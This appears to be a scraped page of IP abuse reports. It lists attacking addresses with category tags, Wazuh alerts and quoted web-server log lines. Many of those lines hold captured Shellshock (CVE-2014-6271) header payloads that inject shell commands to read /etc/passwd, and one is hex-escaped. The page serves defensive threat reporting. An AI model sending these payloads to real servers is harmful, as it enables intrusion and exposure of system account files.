|
🇸🇬
178.128.212.209
|
|
[20/Jan/2025:05:28:54 -0300] "GET / HTTP/1.0" 200 3926 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
|
DDoS Attack
Email Spam
Port Scan
|
|
🇭🇰
89.185.25.148
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
Port Scan
Hacking
Brute-Force
Web App Attack
SSH
|
|
🇭🇰
89.185.25.149
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
Port Scan
Brute-Force
Web App Attack
SSH
|
|
🇯🇵
156.231.11.144
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
Port Scan
Hacking
Brute-Force
Web App Attack
SSH
|
|
🇺🇸
38.6.191.13
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
DDoS Attack
Port Scan
Hacking
Brute-Force
Web App Attack
SSH
|
|
🇺🇸
23.224.55.231
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
DDoS Attack
Port Scan
Brute-Force
Web App Attack
SSH
|
|
🇺🇸
138.197.23.5
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
DDoS Attack
Port Scan
Brute-Force
Web App Attack
SSH
|
|
🇸🇬
51.79.205.147
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application
|
Port Scan
Exploited Host
Web App Attack
|
|
🇭🇰
180.188.198.135
|
|
HTTP Method: POST
|
Hacking
SQL Injection
Exploited Host
|
|
🇭🇰
206.238.196.225
|
|
206.238.196.225 - - [21/Nov/2024:09:02:19 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 301 178 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
|
DDoS Attack
Brute-Force
Web App Attack
SSH
|
|
🇺🇸
34.234.197.175
|
|
34.234.197.175- - [21/Nov/2024:09:02:19 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 301 178 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
|
DDoS Attack
Brute-Force
Web App Attack
SSH
|
|
🇧🇷
169.150.198.88
|
|
169.150.198.88 - - [17/Nov/2024:20:09:39 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 1577 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
|
DDoS Attack
|
|
🇺🇸
104.28.237.246
|
|
169.150.198.88 - - [17/Nov/2024:20:09:39 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 1577 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
|
DDoS Attack
|
|
🇭🇰
154.201.69.250
|
|
154.201.69.250 - - [10/Nov/2024:10:56:41 +0000] "GET /cgi-bin/status/status.cgi HTTP/1.1" 301 605 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
|
Brute-Force
Web App Attack
SSH
|
|
🇭🇰
156.238.230.115
|
|
rule.description:Shellshock attack detected rule.groups:web, accesslog, attack rule.mitre.technique:Exploitation for Privilege Escalation, Exploit Public-Facing Application rule.mitre.id:T1068, T1190 rule.mitre.tactic:Privilege Escalation, Initial Access rule.id:31168 rule.nist_800_53:SI.4 rule.info:CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 rule.gdpr:IV_35.7.d location:/var/log/nginx/access.log decoder.name:web-accesslog id:1731119647.51148708 GeoLocation.country_name:United States GeoLocation.location:{ "lon": -97.822, "lat": 37.751 } full_log:156.238.230.115 - - [09/Nov/2024:02:34:07 +0000] "GET / HTTP/1.1" 200 324 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" timestamp:Nov 8, 2024 @ 23:34:07.699 _index:wazuh-alerts-4.x-2024.11.09
|
Port Scan
Brute-Force
Web App Attack
|
|
🇺🇸
149.115.241.167
|
|
Exploitation for Privilege Escalation, Exploit Public-Facing Application rule.mitre.id:T1068, T1190 rule.mitre.tactic:Privilege Escalation, Initial Access rule.id:31168 rule.nist_800_53:SI.4 rule.info:CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 rule.gdpr:IV_35.7.d location:/var/log/httpd/access_log decoder.name:web-accesslog id:1731168323.201348404 GeoLocation.city_name:Los Angeles GeoLocation.country_name:United States GeoLocation.region_name:California GeoLocation.location:{ "lon": -118.244, "lat": 34.0544 } full_log:149.115.241.167 - - [09/Nov/2024:13:05:21 -0300] "GET / HTTP/1.1" 200 190 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_7_3; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.7 Safari/605.1.15" timestamp:Nov 9, 2024 @ 13:05:23.162 _index:wazuh-alerts-4.x-2024.11.09
|
Port Scan
Web App Attack
SSH
|
|
🇺🇸
65.49.20.10
|
|
Oct 30 17:02:56 php sshd[3188557]: Invalid user from 65.49.20.102 port 47247
|
Brute-Force
SSH
|
|
🇵🇭
128.1.57.69
|
|
128.1.57.69 - - [30/Oct/2024:04:59:04 +0000] "GET / HTTP/1.1" 200 689 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
|
DDoS Attack
Port Scan
Hacking
Brute-Force
Web App Attack
|
|
🇨🇭
148.187.148.136
|
|
148.187.148.136 - - [30/Oct/2024:06:19:55 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 302 422 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.51"
|
FTP Brute-Force
Hacking
Web App Attack
|
|
🇭🇰
103.85.25.166
|
|
103.85.25.166 - - [25/Oct/2024:11:59:22 +0000] "GET / HTTP/1.1" 301 248 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.20"
|
Port Scan
Web App Attack
SSH
|
|
🇧🇷
45.128.128.248
|
|
5.128.128.248 - - [23/Oct/2024:14:27:54 +0000] "GET / HTTP/1.1" 200 689 "() { Referer; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo -e \x22\x5C0141\x5C0141\x5C0141\x5C0141\x5C0141\x5C0141\x5C0141\x5C0141\x5C0163\x5C0150\x5C0145\x5C0154\x5C0154\x5C0163\x5C0150\x5C0157\x5C0143\x5C0153\x22" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
|
Port Scan
Web App Attack
|
|
🇲🇾
111.90.159.213
|
|
111.90.159.213 - - [24/Oct/2024:08:43:34 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 301 178 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
|
Brute-Force
Web App Attack
|
|
🇯🇵
49.212.203.250
|
|
49.212.203.250 - - [15/Oct/2024:17:43:04 -0300] "GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
DDoS Attack
|
|
🇭🇰
156.224.25.144
|
|
156.224.25.144 - - [27/Sep/2024:09:18:06 +0000] "GET /cgi-bin/slogin/login.py HTTP/1.1" 301 178 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"
|
Port Scan
Brute-Force
SSH
|
|
🇳🇱
94.156.64.12
|
|
94.156.64.12 - - [16/Sep/2024:16:44:06 +0000] "GET / HTTP/1.1" 200 4388 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
|
Port Scan
Hacking
Brute-Force
SSH
|